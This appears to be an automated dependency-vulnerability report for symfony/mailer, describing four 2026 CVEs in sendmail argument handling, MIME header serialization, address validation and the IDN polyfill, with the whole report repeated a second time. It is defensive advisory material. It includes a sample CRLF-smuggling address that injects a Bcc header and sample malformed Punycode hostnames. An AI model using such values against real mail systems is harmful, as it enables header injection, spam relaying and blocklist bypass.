Vulnerable Library - symfony/mailer-v8.0.0
Helps sending emails
Library home page: https://api.github.com/repos/symfony/mailer/zipball/f9b546f0e28cbd08fd5d03f2472aad913a9398f9
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-2026-45068
Vulnerable Library - symfony/mailer-v8.0.0
Helps sending emails
Library home page: https://api.github.com/repos/symfony/mailer/zipball/f9b546f0e28cbd08fd5d03f2472aad913a9398f9
Dependency Hierarchy:
- ❌ symfony/mailer-v8.0.0 (Vulnerable Library)
Found in base branch: develop
Vulnerability Details
Description Symfony Mailer selects a transport via the "MAILER_DSN" environment variable / configuration (e.g. "smtp://...", "sendmail://...", "native://default"). "SendmailTransport" invokes the local "sendmail" binary and supports two modes: "-bs" (speak SMTP over stdin: the default) and "-t" (read the message on stdin, pass recipients as command-line arguments). In "-t" mode, recipient addresses are appended to the sendmail command line without a "--" end-of-options separator. A recipient address beginning with "-" (which "Symfony\Component\Mime\Address" accepts as valid) is therefore interpreted by sendmail as a command-line option rather than an address. Resolution The "SendmailTransport" transport now ensure "--" is set before the list of recipients. The patch for this issue is available "here" (symfony/symfony@c451448) for branch 5.4. Credits Symfony would like to thank Claude Mythos Preview (via Project Glasswing) for reporting the issue and providing the fix.
Publish Date: 2026-05-31
URL: CVE-2026-45068
CVSS 3 Score Details (8.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v8.0.11,https://github.com/symfony/symfony.git - v7.4.11,https://github.com/symfony/symfony.git - v6.4.39,https://github.com/symfony/symfony.git - v5.4.52
Step up your Open Source Security Game with Mend here
CVE-2026-45070
Vulnerable Library - symfony/mime-v8.0.0
Allows manipulating MIME messages
Library home page: https://api.github.com/repos/symfony/mime/zipball/7576ce3b2b4d3a2a7fe7020a07a392065d6ffd40
Dependency Hierarchy:
- symfony/mailer-v8.0.0 (Root Library)
- ❌ symfony/mime-v8.0.0 (Vulnerable Library)
Found in base branch: develop
Vulnerability Details
Description "Symfony\Component\Mime\Header\ParameterizedHeader" (and the related parameter handling reachable from "Symfony\Component\Mime\Header\Headers") is responsible for serializing structured headers such as "Content-Type" and "Content-Disposition", which carry "key=value" parameters (e.g. "Content-Disposition: attachment; filename="x""). RFC 2045 / RFC 5322 require parameter names to be "tokens": a restricted ASCII subset that excludes whitespace, CR/LF, and the "tspecials" set. Symfony's parameter handling validates and properly encodes parameter values, but does not validate parameter names: the supplied name is emitted verbatim into the serialized header. A caller that derives a parameter name from untrusted input, e.g. an application that lets a user influence a "Content-Disposition" parameter name, can include "\r\n" or other non-token bytes inside the name, terminating the current header and injecting additional headers in the rendered message. This is the classic CRLF / header-injection primitive applied to the parameter-name slot. Resolution "ParameterizedHeader" now rejects parameter names that contain bytes outside the RFC "token" character class. The patch for this issue is available "here" (symfony/symfony@e62ea21) for branch 5.4. Credits Symfony would like to thank Fabian Fleischer for reporting the issue and Alexandre Daubois for fixing it.
Publish Date: 2026-05-31
URL: CVE-2026-45070
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v7.4.10,https://github.com/symfony/symfony.git - v5.4.52,https://github.com/symfony/symfony.git - v8.0.10,https://github.com/symfony/symfony.git - v6.4.38
Step up your Open Source Security Game with Mend here
CVE-2026-45067
Vulnerable Library - symfony/mime-v8.0.0
Allows manipulating MIME messages
Library home page: https://api.github.com/repos/symfony/mime/zipball/7576ce3b2b4d3a2a7fe7020a07a392065d6ffd40
Dependency Hierarchy:
- symfony/mailer-v8.0.0 (Root Library)
- ❌ symfony/mime-v8.0.0 (Vulnerable Library)
Found in base branch: develop
Vulnerability Details
Description "Symfony\Component\Mime\Address" is the value-object every Symfony Mailer address (to/cc/bcc/from/reply-to) flows through; its constructor is documented as validating the address and throwing on invalid input, so developers treat it as a security boundary. The constructor accepts email addresses whose local-part (the part before "@") is an RFC-5322 quoted string containing raw "\r\n" bytes, e.g. ""x\r\nBcc: attacker@evil"@example.com". The stored address is later emitted verbatim into (1) the rendered message headers and (2) "SmtpTransport"'s "MAIL FROM:<...>" / "RCPT TO:<...>" protocol lines, turning the embedded CRLF into a new mail header and/or a new SMTP command. Resolution The "Address" constructor now rejects addresses containing line breaks. The patch for this issue is available "here" (symfony/symfony@dc2dbd2) for branch 5.4. Credits We would like to thank Claude Mythos Preview (via Project Glasswing) for reporting the issue and providing the fix.
Publish Date: 2026-05-31
URL: CVE-2026-45067
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v8.0.10,https://github.com/symfony/symfony.git - v6.4.38,https://github.com/symfony/symfony.git - v5.4.52,https://github.com/symfony/symfony.git - v7.4.10
Step up your Open Source Security Game with Mend here
CVE-2026-46644
Vulnerable Library - symfony/polyfill-intl-idn-v1.33.0
Symfony polyfill for intl's idn_to_ascii and idn_to_utf8 functions
Library home page: https://api.github.com/repos/symfony/polyfill-intl-idn/zipball/9614ac4d8061dc257ecc64cba1b140873dce8ad3
Dependency Hierarchy:
- symfony/mailer-v8.0.0 (Root Library)
- egulias/email-validator-4.0.4
- ❌ symfony/polyfill-intl-idn-v1.33.0 (Vulnerable Library)
Found in base branch: develop
Vulnerability Details
Description "symfony/polyfill-intl-idn" provides a userland implementation of "idn_to_utf8()" and "idn_to_ascii()" for runtimes that lack the "intl" extension. Its "Idn::process()" method decodes labels prefixed with "xn--" using Punycode but never enforces the validity criterion added in UTS #46 revision 33 Section 4 step 4.1.2: after a successful Punycode decode, the result must contain at least one non-ASCII code point. As a consequence, "xn--" labels whose Punycode payload is empty ("xn--") or decodes to a string made of only ASCII code points (e.g. "xn--kc1zs4-") are accepted by the polyfill while PHP's native "ext-intl" rejects them with "IDNA_ERROR_INVALID_ACE_LABEL". Originally unequal domain names are therefore regarded as equal, which can lead to blacklist bypassing, inconsistent URL parsing and server-side request forgery (similar to CVE-2024-12224). Example with "IDNA_USE_STD3_RULES | IDNA_CHECK_BIDI | IDNA_CHECK_CONTEXTJ | IDNA_NONTRANSITIONAL_TO_ASCII": | Input | Polyfill output | Native "ext-intl" output | | --- | --- | --- | | "poc.xn--kc1zs4-.com" | "poc.kc1zs4.com" | "false" ("errors=1024") | | "poc.kc1zs4.xn--" | "poc.kc1zs4." | "false" ("errors=1024") | Applications using the polyfill to canonicalise or compare hostnames inherit the inconsistency. Resolution "Idn::process()" now records "IDNA_ERROR_INVALID_ACE_LABEL" when a Punycode payload decodes to an empty string or to a string containing only ASCII code points, matching the native "ext-intl" behaviour and UTS #46 revision 33. The patch for this issue is available "here" (symfony/polyfill@1be936e) for branch 1.x. Credits Symfony would like to thank Nazy Mad for reporting the issue and Nicolas Grekas for providing the fix.
Publish Date: 2026-05-31
URL: CVE-2026-46644
CVSS 3 Score Details (5.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-2xf4-cg6j-vhgq
Release Date: 2026-05-28
Fix Resolution: symfony/polyfill-intl-idn - v1.38.1,symfony/polyfill - v1.38.1
Step up your Open Source Security Game with Mend here
Helps sending emails
Library home page: https://api.github.com/repos/symfony/mailer/zipball/f9b546f0e28cbd08fd5d03f2472aad913a9398f9
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Library - symfony/mailer-v8.0.0
Helps sending emails
Library home page: https://api.github.com/repos/symfony/mailer/zipball/f9b546f0e28cbd08fd5d03f2472aad913a9398f9
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Description Symfony Mailer selects a transport via the "MAILER_DSN" environment variable / configuration (e.g. "smtp://...", "sendmail://...", "native://default"). "SendmailTransport" invokes the local "sendmail" binary and supports two modes: "-bs" (speak SMTP over stdin: the default) and "-t" (read the message on stdin, pass recipients as command-line arguments). In "-t" mode, recipient addresses are appended to the sendmail command line without a "--" end-of-options separator. A recipient address beginning with "-" (which "Symfony\Component\Mime\Address" accepts as valid) is therefore interpreted by sendmail as a command-line option rather than an address. Resolution The "SendmailTransport" transport now ensure "--" is set before the list of recipients. The patch for this issue is available "here" (symfony/symfony@c451448) for branch 5.4. Credits Symfony would like to thank Claude Mythos Preview (via Project Glasswing) for reporting the issue and providing the fix.
Publish Date: 2026-05-31
URL: CVE-2026-45068
CVSS 3 Score Details (8.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v8.0.11,https://github.com/symfony/symfony.git - v7.4.11,https://github.com/symfony/symfony.git - v6.4.39,https://github.com/symfony/symfony.git - v5.4.52
Step up your Open Source Security Game with Mend here
Vulnerable Library - symfony/mime-v8.0.0
Allows manipulating MIME messages
Library home page: https://api.github.com/repos/symfony/mime/zipball/7576ce3b2b4d3a2a7fe7020a07a392065d6ffd40
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Description "Symfony\Component\Mime\Header\ParameterizedHeader" (and the related parameter handling reachable from "Symfony\Component\Mime\Header\Headers") is responsible for serializing structured headers such as "Content-Type" and "Content-Disposition", which carry "key=value" parameters (e.g. "Content-Disposition: attachment; filename="x""). RFC 2045 / RFC 5322 require parameter names to be "tokens": a restricted ASCII subset that excludes whitespace, CR/LF, and the "tspecials" set. Symfony's parameter handling validates and properly encodes parameter values, but does not validate parameter names: the supplied name is emitted verbatim into the serialized header. A caller that derives a parameter name from untrusted input, e.g. an application that lets a user influence a "Content-Disposition" parameter name, can include "\r\n" or other non-token bytes inside the name, terminating the current header and injecting additional headers in the rendered message. This is the classic CRLF / header-injection primitive applied to the parameter-name slot. Resolution "ParameterizedHeader" now rejects parameter names that contain bytes outside the RFC "token" character class. The patch for this issue is available "here" (symfony/symfony@e62ea21) for branch 5.4. Credits Symfony would like to thank Fabian Fleischer for reporting the issue and Alexandre Daubois for fixing it.
Publish Date: 2026-05-31
URL: CVE-2026-45070
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v7.4.10,https://github.com/symfony/symfony.git - v5.4.52,https://github.com/symfony/symfony.git - v8.0.10,https://github.com/symfony/symfony.git - v6.4.38
Step up your Open Source Security Game with Mend here
Vulnerable Library - symfony/mime-v8.0.0
Allows manipulating MIME messages
Library home page: https://api.github.com/repos/symfony/mime/zipball/7576ce3b2b4d3a2a7fe7020a07a392065d6ffd40
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Description "Symfony\Component\Mime\Address" is the value-object every Symfony Mailer address (to/cc/bcc/from/reply-to) flows through; its constructor is documented as validating the address and throwing on invalid input, so developers treat it as a security boundary. The constructor accepts email addresses whose local-part (the part before "@") is an RFC-5322 quoted string containing raw "\r\n" bytes, e.g. ""x\r\nBcc: attacker@evil"@example.com". The stored address is later emitted verbatim into (1) the rendered message headers and (2) "SmtpTransport"'s "MAIL FROM:<...>" / "RCPT TO:<...>" protocol lines, turning the embedded CRLF into a new mail header and/or a new SMTP command. Resolution The "Address" constructor now rejects addresses containing line breaks. The patch for this issue is available "here" (symfony/symfony@dc2dbd2) for branch 5.4. Credits We would like to thank Claude Mythos Preview (via Project Glasswing) for reporting the issue and providing the fix.
Publish Date: 2026-05-31
URL: CVE-2026-45067
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/symfony/symfony.git - v8.0.10,https://github.com/symfony/symfony.git - v6.4.38,https://github.com/symfony/symfony.git - v5.4.52,https://github.com/symfony/symfony.git - v7.4.10
Step up your Open Source Security Game with Mend here
Vulnerable Library - symfony/polyfill-intl-idn-v1.33.0
Symfony polyfill for intl's idn_to_ascii and idn_to_utf8 functions
Library home page: https://api.github.com/repos/symfony/polyfill-intl-idn/zipball/9614ac4d8061dc257ecc64cba1b140873dce8ad3
Dependency Hierarchy:
Found in base branch: develop
Vulnerability Details
Description "symfony/polyfill-intl-idn" provides a userland implementation of "idn_to_utf8()" and "idn_to_ascii()" for runtimes that lack the "intl" extension. Its "Idn::process()" method decodes labels prefixed with "xn--" using Punycode but never enforces the validity criterion added in UTS #46 revision 33 Section 4 step 4.1.2: after a successful Punycode decode, the result must contain at least one non-ASCII code point. As a consequence, "xn--" labels whose Punycode payload is empty ("xn--") or decodes to a string made of only ASCII code points (e.g. "xn--kc1zs4-") are accepted by the polyfill while PHP's native "ext-intl" rejects them with "IDNA_ERROR_INVALID_ACE_LABEL". Originally unequal domain names are therefore regarded as equal, which can lead to blacklist bypassing, inconsistent URL parsing and server-side request forgery (similar to CVE-2024-12224). Example with "IDNA_USE_STD3_RULES | IDNA_CHECK_BIDI | IDNA_CHECK_CONTEXTJ | IDNA_NONTRANSITIONAL_TO_ASCII": | Input | Polyfill output | Native "ext-intl" output | | --- | --- | --- | | "poc.xn--kc1zs4-.com" | "poc.kc1zs4.com" | "false" ("errors=1024") | | "poc.kc1zs4.xn--" | "poc.kc1zs4." | "false" ("errors=1024") | Applications using the polyfill to canonicalise or compare hostnames inherit the inconsistency. Resolution "Idn::process()" now records "IDNA_ERROR_INVALID_ACE_LABEL" when a Punycode payload decodes to an empty string or to a string containing only ASCII code points, matching the native "ext-intl" behaviour and UTS #46 revision 33. The patch for this issue is available "here" (symfony/polyfill@1be936e) for branch 1.x. Credits Symfony would like to thank Nazy Mad for reporting the issue and Nicolas Grekas for providing the fix.
Publish Date: 2026-05-31
URL: CVE-2026-46644
CVSS 3 Score Details (5.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-2xf4-cg6j-vhgq
Release Date: 2026-05-28
Fix Resolution: symfony/polyfill-intl-idn - v1.38.1,symfony/polyfill - v1.38.1
Step up your Open Source Security Game with Mend here